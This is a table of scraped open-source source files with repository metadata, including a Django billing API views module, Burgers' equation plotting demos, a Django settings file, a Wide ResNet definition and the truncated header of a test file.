| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| silverapp/silver | silver/api/views/transaction_views.py | 1 | 4548 |
# Copyright (c) 2015 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from uuid import UUID
from django_filters.rest_framework import DjangoFilterBackend
from django_fsm import TransitionNotAllowed
from django.http import Http404
from rest_framework import permissions, status
from rest_framework.generics import ListCreateAPIView, get_object_or_404, RetrieveUpdateAPIView
from rest_framework.response import Response
from rest_framework.views import APIView
from silver.api.filters import TransactionFilter
from silver.api.serializers.transaction_serializers import TransactionSerializer
from silver.models import PaymentMethod, Transaction
class TransactionList(ListCreateAPIView):
permission_classes = (permissions.IsAuthenticated,)
serializer_class = TransactionSerializer
filter_backends = (DjangoFilterBackend,)
filterset_class = TransactionFilter
def get_queryset(self):
customer_pk = self.kwargs.get('customer_pk', None)
payment_method_id = self.kwargs.get('payment_method_id')
if payment_method_id:
payment_method = get_object_or_404(PaymentMethod,
id=payment_method_id,
customer__pk=customer_pk)
return Transaction.objects.filter(
payment_method=payment_method
)
else:
return Transaction.objects.filter(
payment_method__customer__pk=customer_pk
)
def perform_create(self, serializer):
payment_method_id = self.kwargs.get('payment_method_id')
if payment_method_id:
payment_method = get_object_or_404(PaymentMethod,
id=payment_method_id)
serializer.save(payment_method=payment_method)
else:
serializer.save()
class TransactionDetail(RetrieveUpdateAPIView):
permission_classes = (permissions.AllowAny,)
serializer_class = TransactionSerializer
http_method_names = ('get', 'patch', 'head', 'options')
def get_object(self):
transaction_uuid = self.kwargs.get('transaction_uuid', None)
try:
uuid = UUID(transaction_uuid, version=4)
except ValueError:
raise Http404
return get_object_or_404(Transaction, uuid=uuid)
class TransactionAction(APIView):
permission_classes = (permissions.IsAuthenticated,)
allowed_actions = ('cancel', )
def post(self, request, *args, **kwargs):
transaction = self.get_object(**kwargs)
requested_action = kwargs.get('requested_action')
if requested_action not in self.allowed_actions:
error_message = "{} is not an allowed".format(requested_action)
return Response({"errors": error_message},
status=status.HTTP_400_BAD_REQUEST)
action_to_execute = getattr(transaction, requested_action, None)
if not action_to_execute:
raise Http404
try:
errors = action_to_execute()
transaction.save()
except TransitionNotAllowed:
errors = "Can't execute action because the transaction is in an " \
"incorrect state: {}".format(transaction.state)
if errors:
return Response({"errors": errors},
status=status.HTTP_400_BAD_REQUEST)
transaction_serialized = TransactionSerializer(transaction,
context={'request': request})
return Response(transaction_serialized.data,
status=status.HTTP_200_OK)
def get_object(self, **kwargs):
transaction_uuid = kwargs.get('transaction_uuid')
customer_pk = kwargs.get('customer_pk')
return get_object_or_404(
Transaction.objects.all(),
uuid=transaction_uuid,
payment_method__customer__pk=customer_pk
)
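# Illustrative only: a minimal sketch of how these views could be wired into a URLconf.
# The route patterns below are assumptions for this example (silver's actual urls.py is
# not shown here); the kwarg names match what the views read above
# ('customer_pk', 'payment_method_id', 'transaction_uuid', 'requested_action'):
#
#     from django.urls import path
#
#     urlpatterns = [
#         path('customers/<int:customer_pk>/transactions/',
#              TransactionList.as_view()),
#         path('customers/<int:customer_pk>/payment_methods/<int:payment_method_id>/transactions/',
#              TransactionList.as_view()),
#         path('transactions/<transaction_uuid>/', TransactionDetail.as_view()),
#         path('customers/<int:customer_pk>/transactions/<transaction_uuid>/<requested_action>/',
#              TransactionAction.as_view()),
#     ]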
| apache-2.0 | 2,897,298,705,134,729,000 | 35.97561 | 95 | 0.645339 | false | 4.593939 | false | false | false |
| maojrs/riemann_book | exact_solvers/burgers_demos.py | 2 | 10422 |
"""
Additional functions and demos for Burgers' equation.
"""
import sys, os
from clawpack import pyclaw
from clawpack import riemann
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import HTML
import numpy as np
from utils import riemann_tools
from . import burgers
def multivalued_solution(t,fig=0):
"""Plots bump-into-wave figure at different times for interactive figure."""
if fig==0:
fig = plt.figure()
x = np.arange(-11.0,11.0,0.1)
y = np.exp(-x*x/10)
x2 = 1.0*x
x2 = x2 + t*y
plt.plot(x, y, '--k', label = "Initial Condition")
plt.plot(x2, y, '-k', label = r"Solution at time $t$")
plt.xlim([-10,10])
plt.legend(loc = 'upper left')
plt.title('t = %.2f' % t)
if t != 0:
numarrows = 7
arrowIndexList = np.linspace(len(x)/3,2*len(x)/3,numarrows, dtype = int)
for i in arrowIndexList:
plt.arrow(x[i], y[i], np.abs(t*y[i]-0.4), 0, head_width=0.02, head_length=0.4, fc='k', ec='k')
if fig==0: plt.show()
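# Usage sketch (assumption: a Jupyter notebook with ipywidgets installed), since the
# docstring describes this as the callback for an interactive figure:
#
#     from ipywidgets import interact, fixed, FloatSlider
#     interact(multivalued_solution,
#              t=FloatSlider(min=0.0, max=10.0, step=0.5, value=0.0), fig=fixed(0))
#
# Each point of the initial hump is translated with speed equal to its own value of q,
# so for large enough t the profile folds over and the "solution" becomes multivalued.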
def shock():
"""Returns plot function for a shock solution."""
q_l, q_r = 5.0, 1.0
states, speeds, reval, wave_type = burgers.exact_riemann_solution(q_l ,q_r)
plot_function = riemann_tools.make_plot_function(states, speeds, reval, wave_type,
layout='horizontal',
variable_names=['q'],
plot_chars=[burgers.speed])
return plot_function
def shock_location(xshock=7.75,fig=0):
"""Plots equal-area shock figure for different shock positions for interactive figure."""
if fig==0:
fig = plt.figure()
t=10
x = np.arange(-11.0,11.0,0.05)
y = np.exp(-x*x/10)
x = x + t*y
x2 = 1.0*x
y2 = 1.0*y
region = -1
for i in range(len(x)):
if (x2[i] >= xshock and region == -1):
region = 0
maxy = 1.0*y[i-1]
if (x2[i] >= xshock and region == 0):
x2[i] = 1.0*xshock
y2[i] = 1.0*maxy
if (x2[i] < xshock and region == 0):
region = 1
maxy = 1.0*y[i-1]
if (x2[i] <= xshock and region == 1):
x2[i] = 1.0*xshock
y2[i] = 1.0*maxy
if (x2[i] > xshock and region == 1):
region = 2
plt.plot(x, y, '-k', lw = 2, label = "Multivalued solution")
plt.plot(x2, y2, '--r', lw = 2, label = "Shock solution")
if (xshock == 7.75):
plt.annotate(r"$A_1$", xy=(2, 0), xytext=(8.5,0.83), fontsize=15)
plt.annotate(r"$A_2$", xy=(2, 0), xytext=(6.5,0.15), fontsize=15)
plt.annotate(r"Equal Areas", xy=(2, 0), xytext=(-3,0.62), fontsize=15)
plt.annotate(r"$A_1=A_2$", xy=(2, 0), xytext=(-2.5,0.5), fontsize=15)
plt.xlim([-7.5,11])
plt.legend(loc = 'upper left')
if fig==0: plt.show()
def rarefaction_figure(t):
"""Plots rarefaction figure at different times for interactive figure."""
numarrows = 6
x = [-5., 0.0]
y = [0.2, 0.2]
for i in range(numarrows):
x.append(0.0)
y.append(y[0] + (i+1)*(1.0-y[0])/(numarrows+1))
x.extend([0.0,10.0])
y.extend([1.0,1.0])
x2 = 1.0*np.array(x)
x2[1:-1] = x2[1:-1] + t*np.array(y[1:-1])
plt.plot(x, y, '--k', label = "Initial Condition")
plt.plot(x2, y, '-k', label = r"Solution at time $t$")
plt.xlim([-5,10])
plt.ylim([0.0,1.2])
plt.legend(loc = 'upper left')
plt.title('t = %.2f' % t)
if t != 0:
for i in range(numarrows):
plt.arrow(x[2+i], y[2+i], np.abs(t*y[2+i]-0.4), 0, head_width=0.02, head_length=0.4, fc='k', ec='k')
plt.annotate(r"$q_r t$", xy=(2, 1), xytext=(t/2-0.2, 1.05), fontsize=12)
if t > 2:
plt.annotate(r"$q_\ell t$", xy=(2, 0), xytext=(t/8-0.4, 0.12), fontsize=12)
plt.arrow(t/2-0.3, 1.07, -t/2+0.8, 0, head_width=0.02, head_length=0.4, fc='k', ec='k')
plt.arrow(t/2+0.7, 1.07, t*y[-1] - t/2 - 1, 0, head_width=0.02, head_length=0.4, fc='k', ec='k')
def rarefaction():
"""Returns plot function for a rarefaction solution."""
q_l, q_r = 2.0, 4.0
states, speeds, reval, wave_type = burgers.exact_riemann_solution(q_l ,q_r)
plot_function = riemann_tools.make_plot_function(states, speeds, reval, wave_type,
layout='horizontal',
variable_names=['q'],
plot_chars=[burgers.speed])
return plot_function
def unphysical():
"""Returns plot function for an unphysical solution."""
q_l, q_r = 1.0, 5.0
states, speeds, reval, wave_type = burgers.unphysical_riemann_solution(q_l ,q_r)
plot_function = riemann_tools.make_plot_function(states, speeds, reval, wave_type,
layout='horizontal',
variable_names=['q'],
plot_chars=[burgers.speed])
return plot_function
def bump_animation(numframes):
"""Plots animation of solution with bump initial condition,
using pyclaw (calls bump_pyclaw)."""
x, frames = bump_pyclaw(numframes)
fig = plt.figure()
ax = plt.axes(xlim=(-1, 1), ylim=(-0.2, 1.2))
line, = ax.plot([], [], '-k', lw=2)
def fplot(frame_number):
frame = frames[frame_number]
pressure = frame.q[0,:]
line.set_data(x,pressure)
return line,
anim = animation.FuncAnimation(fig, fplot, frames=len(frames), interval=30)
plt.close('all')
#return HTML(anim.to_jshtml())
return anim.to_jshtml()
def bump_pyclaw(numframes):
"""Returns pyclaw solution of bump initial condition."""
# Set pyclaw for burgers equation 1D
claw = pyclaw.Controller()
claw.tfinal = 1.5 # Set final time
claw.keep_copy = True # Keep solution data in memory for plotting
claw.output_format = None # Don't write solution data to file
claw.num_output_times = numframes # Number of output frames
claw.solver = pyclaw.ClawSolver1D(riemann.burgers_1D) # Choose burgers 1D Riemann solver
claw.solver.all_bcs = pyclaw.BC.periodic # Choose periodic BCs
claw.verbosity = False # Don't print pyclaw output
domain = pyclaw.Domain( (-1.,), (1.,), (500,)) # Choose domain and mesh resolution
claw.solution = pyclaw.Solution(claw.solver.num_eqn,domain)
# Set initial condition
x=domain.grid.x.centers
claw.solution.q[0,:] = np.exp(-10 * (x)**2)
claw.solver.dt_initial = 1.e99
# Run pyclaw
status = claw.run()
return x, claw.frames
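# Usage sketch (assumption: a Jupyter notebook): bump_animation returns the jshtml
# string produced by matplotlib's animation module, so it is typically wrapped in
# IPython.display.HTML for display, e.g.
#
#     from IPython.display import HTML
#     HTML(bump_animation(numframes=50))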
def triplestate_animation(ql, qm, qr, numframes):
"""Plots animation of solution with triple-state initial condition, using pyclaw (calls
triplestate_pyclaw). Also plots characteristic structure by plotting contour plots of the
solution in the x-t plane """
# Get solution for animation and set plot
x, frames = triplestate_pyclaw(ql, qm, qr, numframes)
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9,4))
ax1.set_xlim(-3, 3)
ax1.set_ylim(-3, 5)
ax2.set_xlim(-3, 3)
ax2.set_ylim(0, 2)
ax1.set_title('Solution q(x)')
ax1.set_xlabel('$x$')
ax1.set_ylabel('$q$')
ax2.set_title('Characteristics')
ax2.set_xlabel('$x$')
ax2.set_ylabel('$t$')
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
line1, = ax1.plot([], [], '-k', lw=2)
# Contour plot of high-res solution to show characteristic structure in xt-plane
meshpts = 2400
numframes2 = 600
x2, frames2 = triplestate_pyclaw(ql, qm, qr, numframes2)
characs = np.zeros([numframes2,meshpts])
xx = np.linspace(-12,12,meshpts)
tt = np.linspace(0,2,numframes2)
for j in range(numframes2):
characs[j] = frames2[j].q[0]
X,T = np.meshgrid(xx,tt)
ax2.contour(X, T, characs, levels=np.linspace(ql, ql+0.11 ,20), linewidths=0.5, colors='k')
ax2.contour(X, T, characs, levels=np.linspace(qm+0.11, qm+0.13 ,7), linewidths=0.5, colors='k')
ax2.contour(X, T, characs, levels=np.linspace(qr+0.13, qr+0.2 ,15), linewidths=0.5, colors='k')
ax2.contour(X, T, characs, 12, linewidths=0.5, colors='k')
#ax2.contour(X, T, characs, 38, colors='k')
# Add animated time line to xt-plane
line2, = ax2.plot(x, 0*x , '--k')
line = [line1, line2]
# Update data function for animation
def fplot(frame_number):
frame = frames[frame_number]
pressure = frame.q[0,:]
line[0].set_data(x,pressure)
line[1].set_data(x,0*x+frame.t)
return line
anim = animation.FuncAnimation(fig, fplot, frames=len(frames), interval=30, blit=False)
plt.close('all')
#return HTML(anim.to_jshtml())
return anim.to_jshtml()
def triplestate_pyclaw(ql, qm, qr, numframes):
"""Returns pyclaw solution of triple-state initial condition."""
# Set pyclaw for burgers equation 1D
meshpts = 2400 #600
claw = pyclaw.Controller()
claw.tfinal = 2.0 # Set final time
claw.keep_copy = True # Keep solution data in memory for plotting
claw.output_format = None # Don't write solution data to file
claw.num_output_times = numframes # Number of output frames
claw.solver = pyclaw.ClawSolver1D(riemann.burgers_1D) # Choose burgers 1D Riemann solver
    claw.solver.all_bcs = pyclaw.BC.extrap                # Choose extrapolation (outflow) BCs
claw.verbosity = False # Don't print pyclaw output
domain = pyclaw.Domain( (-12.,), (12.,), (meshpts,)) # Choose domain and mesh resolution
claw.solution = pyclaw.Solution(claw.solver.num_eqn,domain)
# Set initial condition
x=domain.grid.x.centers
q0 = 0.0*x
xtick1 = 900 + int(meshpts/12)
xtick2 = xtick1 + int(meshpts/12)
for i in range(xtick1):
q0[i] = ql + i*0.0001
#q0[0:xtick1] = ql
for i in np.arange(xtick1, xtick2):
q0[i] = qm + i*0.0001
#q0[xtick1:xtick2] = qm
for i in np.arange(xtick2, meshpts):
q0[i] = qr + i*0.0001
#q0[xtick2:meshpts] = qr
claw.solution.q[0,:] = q0
claw.solver.dt_initial = 1.e99
# Run pyclaw
status = claw.run()
return x, claw.frames
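# Usage sketch for the remaining demos (assumptions: a Jupyter notebook with ipywidgets
# available; the left/middle/right states below are arbitrary example values, and the
# plot functions returned by shock(), rarefaction() and unphysical() are driven the same
# way, with a time slider passed to interact):
#
#     from IPython.display import HTML
#     from ipywidgets import interact, fixed
#
#     HTML(triplestate_animation(ql=2.0, qm=-1.0, qr=1.0, numframes=50))
#     interact(shock_location, xshock=(0.0, 10.0, 0.25), fig=fixed(0))
#     interact(rarefaction_figure, t=(0.0, 5.0, 0.25))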
| bsd-3-clause | 5,794,931,405,617,469,000 | 38.477273 | 112 | 0.572059 | false | 2.933296 | false | false | false |
| unicef/un-partner-portal | backend/unpp_api/settings/base.py | 1 | 10700 |
from __future__ import absolute_import
import os
import sys
####
# Change per project
####
from django.urls import reverse_lazy
from django.utils.text import slugify
PROJECT_NAME = 'unpp_api'
# Project root; the "apps" directory is added to the python path below
PROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.join(PROJECT_ROOT, 'apps/'))
# domains/hosts etc.
DOMAIN_NAME = os.getenv('DJANGO_ALLOWED_HOST', 'localhost')
WWW_ROOT = 'http://%s/' % DOMAIN_NAME
ALLOWED_HOSTS = [DOMAIN_NAME]
FRONTEND_HOST = os.getenv('UNPP_FRONTEND_HOST', DOMAIN_NAME)
####
# Other settings
####
ADMINS = (
('Alerts', os.getenv('ALERTS_EMAIL') or 'admin@unpartnerportal.com'),
('Tivix', f'unicef-unpp+{slugify(DOMAIN_NAME)}@tivix.com'),
)
SANCTIONS_LIST_URL = 'https://scsanctions.un.org/resources/xml/en/consolidated.xml'
SITE_ID = 1
TIME_ZONE = 'UTC'
LANGUAGE_CODE = 'en-us'
USE_I18N = True
SECRET_KEY = os.getenv('SECRET_KEY')
DEFAULT_CHARSET = 'utf-8'
ROOT_URLCONF = 'unpp_api.urls'
DATA_VOLUME = os.getenv('DATA_VOLUME', '/data')
ALLOWED_EXTENSIONS = (
    'pdf', 'doc', 'docx', 'xls', 'xlsx', 'img', 'png', 'jpg', 'jpeg', 'csv', 'zip'
)
UPLOADS_DIR_NAME = 'uploads'
MEDIA_URL = f'/api/{UPLOADS_DIR_NAME}/'
MEDIA_ROOT = os.getenv('UNPP_UPLOADS_PATH', os.path.join(DATA_VOLUME, UPLOADS_DIR_NAME))
FILE_UPLOAD_MAX_MEMORY_SIZE = 25 * 1024 * 1024 # 25mb
DATA_UPLOAD_MAX_MEMORY_SIZE = 50 * 1024 * 1024
# static resources related. See documentation at: http://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/
STATIC_URL = '/api/static/'
STATIC_ROOT = f'{DATA_VOLUME}/staticserve'
# static serving
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
)
DEBUG = True
IS_DEV = False
IS_STAGING = False
IS_PROD = False
UN_SANCTIONS_LIST_EMAIL_ALERT = 'test@tivix.com' # TODO - change to real one
DEFAULT_FROM_EMAIL = os.getenv('DEFAULT_FROM_EMAIL', 'UNPP Stage <noreply@unpartnerportal.org>')
EMAIL_HOST = os.getenv('EMAIL_HOST')
EMAIL_PORT = os.getenv('EMAIL_PORT')
EMAIL_HOST_USER = os.getenv('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.getenv('EMAIL_HOST_PASSWORD')
EMAIL_USE_TLS = os.getenv('EMAIL_USE_TLS', '').lower() == 'true'
# Get the ENV setting. Needs to be set in .bashrc or similar.
ENV = os.getenv('ENV')
if not ENV:
raise Exception('Environment variable ENV is required!')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.getenv('POSTGRES_DB'),
'USER': os.getenv('POSTGRES_USER'),
'PASSWORD': os.getenv('POSTGRES_PASSWORD'),
'HOST': os.getenv('POSTGRES_HOST'),
'PORT': 5432,
}
}
POSTGRES_SSL_MODE = os.getenv('POSTGRES_SSL_MODE', 'off')
if POSTGRES_SSL_MODE == 'on':
DATABASES['default'].update({'OPTIONS': {"sslmode": 'require'}})
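# The settings above are driven entirely by environment variables. A minimal sketch of
# the variables a local instance would need (names taken from the os.getenv() calls in
# this module; the values are placeholders, not real configuration):
#
#     ENV=dev
#     SECRET_KEY=<random-string>
#     POSTGRES_DB=unpp_api  POSTGRES_USER=postgres  POSTGRES_PASSWORD=<password>
#     POSTGRES_HOST=localhost  POSTGRES_SSL_MODE=off
#     DJANGO_ALLOWED_HOST=localhost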
MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'account.authentication.CustomSocialAuthExceptionMiddleware',
'common.middleware.ActivePartnerMiddleware',
'common.middleware.ActiveAgencyOfficeMiddleware',
'common.middleware.ClientTimezoneMiddleware',
]
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.static',
],
},
},
]
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.humanize',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'django_filters',
'imagekit',
'django_countries',
'mail_templated',
'social_django',
'sequences.apps.SequencesConfig',
'django_nose',
'background_task',
'common',
'account',
'agency',
'partner',
'project',
'review',
'storages',
'notification',
'sanctionslist',
'management',
'reports',
'externals',
]
# auth / django-registration params
AUTH_USER_MODEL = 'account.User'
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS': {
'min_length': 12,
}
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
PASSWORD_RESET_TIMEOUT_DAYS = 31
ACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS = 7
AUTHENTICATION_BACKENDS = [
'django.contrib.auth.backends.ModelBackend',
'account.authentication.CustomAzureADBBCOAuth2',
]
# Django-social-auth settings
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_KEY = os.getenv('AZURE_B2C_CLIENT_ID', None)
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_SECRET = os.getenv('AZURE_B2C_CLIENT_SECRET', None)
SOCIAL_AUTH_URL_NAMESPACE = 'social'
SOCIAL_AUTH_SANITIZE_REDIRECTS = True
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_POLICY = os.getenv('AZURE_B2C_POLICY_NAME', "b2c_1A_UNICEF_PARTNERS_signup_signin")
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_PW_RESET_POLICY = os.getenv(
'AZURE_B2C_PW_RESET_POLICY_NAME', "B2C_1_PasswordResetPolicy"
)
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_TENANT_ID = os.getenv('AZURE_B2C_TENANT', 'unicefpartners.onmicrosoft.com')
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_SCOPE = [
'openid', 'email', 'profile',
]
IGNORE_DEFAULT_SCOPE = True
SOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = True
SOCIAL_AUTH_PROTECTED_USER_FIELDS = ['email']
SOCIAL_AUTH_LOGIN_REDIRECT_URL = reverse_lazy('accounts:social-logged-in')
SOCIAL_AUTH_PIPELINE = (
'account.authentication.social_details',
'social_core.pipeline.social_auth.social_uid',
'social_core.pipeline.social_auth.auth_allowed',
'social_core.pipeline.social_auth.social_user',
'social_core.pipeline.user.get_username',
'account.authentication.require_email',
'social_core.pipeline.social_auth.associate_by_email',
'account.authentication.create_user',
'social_core.pipeline.social_auth.associate_user',
'social_core.pipeline.social_auth.load_extra_data',
'account.authentication.user_details',
)
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_USER_FIELDS = [
'email', 'fullname'
]
TEST_RUNNER = os.getenv('DJANGO_TEST_RUNNER', 'django.test.runner.DiscoverRunner')
NOSE_ARGS = ['--with-timer', '--nocapture', '--nologcapture']
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'TEST_REQUEST_DEFAULT_FORMAT': 'json',
}
REST_AUTH_SERIALIZERS = {
'LOGIN_SERIALIZER': 'account.serializers.CustomLoginSerializer',
'USER_DETAILS_SERIALIZER': 'account.serializers.SimpleAccountSerializer',
'PASSWORD_RESET_SERIALIZER': 'account.serializers.CustomPasswordResetSerializer',
}
# helper function to extend all the common lists
def extend_list_avoid_repeats(list_to_extend, extend_with):
"""Extends the first list with the elements in the second one, making sure its elements are not already there in the
original list."""
list_to_extend.extend(filter(lambda x: not list_to_extend.count(x), extend_with))
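# Minimal usage sketch (hypothetical): environment-specific settings modules that do
# `from .base import *` can use this helper to append extra entries without creating
# duplicates, e.g.
#
#     extend_list_avoid_repeats(INSTALLED_APPS, ['debug_toolbar'])
#     extend_list_avoid_repeats(MIDDLEWARE, ['debug_toolbar.middleware.DebugToolbarMiddleware'])
#
# (debug_toolbar here is purely illustrative, not part of this project's requirements)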
LOG_LEVEL = 'DEBUG' if DEBUG and 'test' not in sys.argv else 'INFO'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s line %(lineno)d: %(message)s'
},
'verbose': {
'format': '[%(asctime)s][%(levelname)s][%(name)s] %(filename)s.%(funcName)s:%(lineno)d %(message)s',
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'default': {
'level': LOG_LEVEL,
'class': 'logging.StreamHandler',
'formatter': 'standard',
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'include_html': True,
}
},
'loggers': {
'': {
'handlers': ['default'],
'level': 'INFO',
'propagate': True
},
'console': {
'handlers': ['default'],
'level': 'DEBUG',
'propagate': True
},
'django.request': {
'handlers': ['mail_admins', 'default'],
'level': 'ERROR',
'propagate': False,
},
'django.security.DisallowedHost': {
# Skip "SuspiciousOperation: Invalid HTTP_HOST" e-mails.
'handlers': ['default'],
'propagate': False,
},
}
}
UNHCR_API_HOST = os.getenv('UNHCR_API_HOST')
UNHCR_API_USERNAME = os.getenv('UNHCR_API_USERNAME')
UNHCR_API_PASSWORD = os.getenv('UNHCR_API_PASSWORD')
UNICEF_PARTNER_DETAILS_URL = os.getenv('UNICEF_PARTNER_DETAILS_URL')
UNICEF_API_USERNAME = os.getenv('UNICEF_API_USERNAME')
UNICEF_API_PASSWORD = os.getenv('UNICEF_API_PASSWORD')
WFP_API_HOST = os.getenv('WFP_API_HOST')
WFP_API_TOKEN = os.getenv('WFP_API_TOKEN')
GIT_VERSION = os.getenv('GIT_VERSION', 'UNKNOWN')
REDIS_INSTANCE = os.getenv('REDIS_INSTANCE')
if REDIS_INSTANCE:
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': f'redis://{REDIS_INSTANCE}/1',
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
},
'TIMEOUT': 3600
}
}
DJANGO_REDIS_IGNORE_EXCEPTIONS = not DEBUG
else:
CACHES = {
'default': {
'BACKEND': 'common.cache_backends.DummyRedisCache',
'LOCATION': 'unpp'
}
}
SESSION_COOKIE_HTTPONLY = True
SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"
| apache-2.0 | 250,126,248,760,582,600 | 30.378299 | 120 | 0.647477 | false | 3.324014 | true | false | false |
| hendrycks/robustness | old/Icons-50/models/wrn.py | 1 | 3908 |
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, stride, dropRate=0.0):
super(BasicBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.relu1 = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(out_planes)
self.relu2 = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(out_planes, out_planes, kernel_size=3, stride=1,
padding=1, bias=False)
self.droprate = dropRate
self.equalInOut = (in_planes == out_planes)
self.convShortcut = (not self.equalInOut) and nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride,
padding=0, bias=False) or None
def forward(self, x):
if not self.equalInOut:
x = self.relu1(self.bn1(x))
else:
out = self.relu1(self.bn1(x))
if self.equalInOut:
out = self.relu2(self.bn2(self.conv1(out)))
else:
out = self.relu2(self.bn2(self.conv1(x)))
if self.droprate > 0:
out = F.dropout(out, p=self.droprate, training=self.training)
out = self.conv2(out)
if not self.equalInOut:
return torch.add(self.convShortcut(x), out)
else:
return torch.add(x, out)
class NetworkBlock(nn.Module):
def __init__(self, nb_layers, in_planes, out_planes, block, stride, dropRate=0.0):
super(NetworkBlock, self).__init__()
self.layer = self._make_layer(block, in_planes, out_planes, nb_layers, stride, dropRate)
def _make_layer(self, block, in_planes, out_planes, nb_layers, stride, dropRate):
layers = []
for i in range(nb_layers):
layers.append(block(i == 0 and in_planes or out_planes, out_planes, i == 0 and stride or 1, dropRate))
return nn.Sequential(*layers)
def forward(self, x):
return self.layer(x)
class WideResNet(nn.Module):
def __init__(self, depth, num_classes, widen_factor=1, dropRate=0.0):
super(WideResNet, self).__init__()
nChannels = [16, 16 * widen_factor, 32 * widen_factor, 64 * widen_factor]
assert ((depth - 4) % 6 == 0)
n = (depth - 4) // 6
block = BasicBlock
# 1st conv before any network block
self.conv1 = nn.Conv2d(3, nChannels[0], kernel_size=3, stride=1,
padding=1, bias=False)
# 1st block
self.block1 = NetworkBlock(n, nChannels[0], nChannels[1], block, 1, dropRate)
# 2nd block
self.block2 = NetworkBlock(n, nChannels[1], nChannels[2], block, 2, dropRate)
# 3rd block
self.block3 = NetworkBlock(n, nChannels[2], nChannels[3], block, 2, dropRate)
# global average pooling and classifier
self.bn1 = nn.BatchNorm2d(nChannels[3])
self.relu = nn.ReLU(inplace=True)
self.fc = nn.Linear(nChannels[3], num_classes)
self.nChannels = nChannels[3]
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.bias.data.zero_()
def forward(self, x):
out = self.conv1(x)
out = self.block1(out)
out = self.block2(out)
out = self.block3(out)
out = self.relu(self.bn1(out))
out = F.avg_pool2d(out, 8)
out = out.view(-1, self.nChannels)
return self.fc(out)
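# Minimal usage sketch (assumption: 32x32 inputs such as CIFAR-style or Icons-50 crops,
# which is what the fixed 8x8 average pooling in forward() implies). depth must satisfy
# (depth - 4) % 6 == 0; e.g. depth=28, widen_factor=10 is the common WRN-28-10 setup,
# and num_classes=50 below is illustrative:
#
#     net = WideResNet(depth=28, num_classes=50, widen_factor=10, dropRate=0.3)
#     logits = net(torch.randn(2, 3, 32, 32))   # -> tensor of shape (2, 50)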
| apache-2.0 | -3,741,773,476,238,839,300 | 39.708333 | 116 | 0.56781 | false | 3.273032 | false | false | false |
| Connexions/cnx-authoring | cnxauthoring/tests/test_functional.py | 1 | 173550 |
# -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
